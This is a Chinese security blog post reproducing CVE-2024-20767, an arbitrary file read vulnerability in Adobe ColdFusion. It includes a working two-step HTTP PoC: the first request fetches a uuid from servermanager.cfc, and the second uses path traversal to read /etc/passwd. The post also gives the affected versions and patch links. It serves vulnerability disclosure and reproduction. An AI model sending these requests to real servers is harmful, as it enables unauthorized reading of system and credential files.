【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)

admin 2024年4月2日16:12:36评论24 views字数 1173阅读3分54秒阅读模式

网安引领时代,弥天点亮未来   

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)
0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)
0x01漏洞介绍

Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

Adobe ColdFusion 2023.6, 2021.12 版本及之前版本存在访问控制错误漏洞,该漏洞源于存在不正确的访问控制漏洞,可能导致任意文件系统读取。

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)
0x02影响版本

Adobe ColdFusion 2023.6, 2021.12 版本及之前版本

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)
0x03漏洞复现

1.访问漏洞环境

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)

2.对漏洞进行复现

 POC (GET)

漏洞复现

GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: close

获取uuid

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)

执行文件读取/etc/passwd

GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: closeuuid: 33a347c8-c5ea-4a08-9b40-d83e531cad80

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)

3.nuclei工具测试(漏洞存在)

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)

4.python工具测试

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)

【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://helpx.adobe.com/security/products/coldfusion/apsb24-14.htmlhttps://github.com/yoryio/CVE-2024-20767?tab=readme-ov-filehttps://jeva.cc/2973.html

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月2日16:12:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)http://cn-sec.com/archives/2623465.html

发表评论

匿名网友 填写信息